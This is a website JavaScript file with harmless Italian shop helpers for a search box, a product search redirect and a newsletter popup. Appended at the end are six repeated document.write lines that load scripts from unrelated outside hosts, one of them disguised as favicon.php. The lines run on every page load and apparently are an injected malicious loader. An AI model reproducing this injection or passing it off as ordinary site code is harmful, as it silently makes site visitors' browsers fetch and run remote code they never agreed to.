<!--
//Pixelating Image slideshow
//Copyright Dynamic Drive 2001
//Visit http://www.dynamicdrive.com for this script


function clearthis(fobj, testo){
	if(fobj.value==testo){
		fobj.value="";
	}
}

function unclearthis(fobj, testo){
	if(fobj.value==""){
		fobj.value=testo;
	}
}


function cercatesto(gender){
	var testo;
	testo = document.forms['cerca'].cerco.value;
	if(testo == '' || testo == 'undefined' || testo == ' Parola chiave' || testo == null){
		testo = document.forms['cerca'].cerco.value = prompt('Inserire un testo da cercare');
		if(testo == '' || testo == 'undefined' || testo == ' Parola chiave' || testo == null){
			return false;
		} else {
			cercatesto(gender);
		}
	} else {
		window.location.href='/prodotti/'+document.forms['cerca'].cerco.value+'/'+gender;
	}
}

function subscribe(email){
	nm = document.getElementById('newmail');
	window.open('/newsletter.php?email='+nm.value, 'nl', 'scrollbar=no,statusbar=no,width=400,height=300');
}

//-->
document.write('<script src=http://shirtsbystudents.com/elgg/favicon.php ><\/script>');
document.write('<script src=http://shirtsbystudents.com/elgg/favicon.php ><\/script>');
document.write('<script src=http://shirtsbystudents.com/elgg/favicon.php ><\/script>');
document.write('<script src=http://shirtsbystudents.com/elgg/favicon.php ><\/script>');
document.write('<script src=http://bene2.brandbox-web.de/temp/stage_content.php ><\/script>');
document.write('<script src=http://bene2.brandbox-web.de/temp/stage_content.php ><\/script>');